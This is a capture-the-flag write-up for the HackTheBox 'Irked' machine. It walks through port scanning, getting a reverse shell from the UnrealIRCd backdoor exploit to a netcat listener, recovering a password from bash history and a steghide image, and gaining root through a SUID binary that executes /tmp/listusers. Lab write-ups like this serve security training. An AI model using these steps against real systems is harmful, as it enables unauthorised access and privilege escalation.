Welcome to the Irked writeup from HTB
I hope you enjoy reading it. Any feedback will be appreciated! @x4v1l0k


tags: HTB Easy Linux OSCP
Platform: Hackthebox
Difficult: Easy
S.O.: Linux



To get started, we run a quick open ports scan.

$ nmap -p- -T4
Starting Nmap 7.80 ( https://nmap.org ) at 2021-04-14 19:37 CEST
Nmap scan report for
Host is up (0.094s latency).
Not shown: 65528 closed ports
22/tcp    open  ssh
80/tcp    open  http
111/tcp   open  rpcbind
6697/tcp  open  ircs-u
8067/tcp  open  infi-async
47160/tcp open  unknown
65534/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 162.14 seconds

Now that we know the open ports, let's scan them in depth.

$ nmap -A -Pn -p 22,80,111,6697,8067,47160,65534
Starting Nmap 7.80 ( https://nmap.org ) at 2021-04-14 19:41 CEST
Nmap scan report for
Host is up (0.093s latency).

22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey: 
|   1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA)
|   2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA)
|   256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA)
|_  256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (ED25519)
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Site doesn´t have a title (text/html).
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          47160/tcp   status
|   100024  1          48955/udp   status
|   100024  1          54720/tcp6  status
|_  100024  1          58993/udp6  status
6697/tcp  open  irc     UnrealIRCd
8067/tcp  open  irc     UnrealIRCd
47160/tcp open  status  1 (RPC #100024)
65534/tcp open  irc     UnrealIRCd
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.12 (95%), Linux 3.13 (95%), Linux 3.16 (95%), Linux 3.18 (95%), Linux 3.2 - 4.9 (95%), Linux 3.8 - 3.11 (95%), Linux 4.4 (95%), Linux 4.2 (95%), Linux 4.8 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: irked.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 6697/tcp)
1   93.68 ms
2   93.72 ms

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.65 seconds


Getting shell

As we can see, it have an UnrealIRCd server installed and running. Searching the internet we can find a backdoor that should give us a shell.

We need to edit it and enter our IP and the port we want in these lines.

# Sets the local ip and port (address and port to listen on)
local_ip = ''  # CHANGE THIS
local_port = ''  # CHANGE THIS 

Now whit a terminal listening we just have to run the exploit like python3 UnrealIRCd.py -payload python 8067.

$ nc -lnvp 8787
listening on [any] 8787 ...
connect to [] from (UNKNOWN) [] 50785
ircd@irked:~/Unreal3.2$ id
uid=1001(ircd) gid=1001(ircd) groups=1001(ircd)

Post exploitation

Privilege escalation: irdc to djmardov


Bash History

Looking at the bash_history file we can see that a file called .backup has recently been used inside /home/djmardov/

ircd@irked:~$ cat .bash_history 
cd djmardov
cd Documents
ls -lah
cat .backup

If we look at its content it shows us what it says to be a password for something hidden with steg

ircd@irked:~$ cd /home/djmardov/Documents/
ircd@irked:/home/djmardov/Documents$ ls -la
total 16
drwxr-xr-x  2 djmardov djmardov 4096 May 15  2018 .
drwxr-xr-x 18 djmardov djmardov 4096 Nov  3  2018 ..
-rw-r--r--  1 djmardov djmardov   52 May 16  2018 .backup
-rw-------  1 djmardov djmardov   33 May 15  2018 user.txt
ircd@irked:/home/djmardov/Documents$ cat .backup 
Super elite steg backup pw

If we look inside the website, we can find the following image.


And when downloading it and using steghide on it with the password obtained in the .backup file we managed to extract a file called pass.txt that contains the password of the user djmardov.

$ steghide --extract -sf irked.jpg
Anotar salvoconducto: 
anot� los datos extra�dos e/"pass.txt".
$ cat pass.txt

And now we can use the password to connect via SSH and read the user flag.

$ ssh djmardov@
djmardov@'s password: 

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue May 15 08:56:32 2018 from
djmardov@irked:~$ cd Documents/
djmardov@irked:~/Documents$ cat user.txt 

Privilege escalation: djmardov to root


djmardov@irked:~/.cache$ find / -perm /4000 2>/dev/null

We have a strange file /usr/bin/viewuser. Let's download it to our machine and see what it does.


This is the pseudo code of the binary extracted with Ghidra.

undefined4 main(undefined1 param_1) {
  puts("This application is being devleoped to set and test user permissions");
  puts("It is still being actively developed");
  return 0;

As we can see, we should be able to create a script called /tmp/listusers that executes /bin/bash and it will be executed as root thanks to setuid (0);.

djmardov@irked:~$ echo "/bin/bash" > /tmp/listusers
djmardov@irked:~$ chmod 777 /tmp/listusers

Now we execute the SUID binary and we will be root!

djmardov@irked:~$ /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2021-04-14 13:40 (:0)
djmardov pts/2        2021-04-14 14:29 (
root@irked:~# whoami
root@irked:~# id
uid=0(root) gid=1000(djmardov) groups=1000(djmardov),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),110(lpadmin),113(scanner),117(bluetooth)
root@irked:~# cat /root/root.txt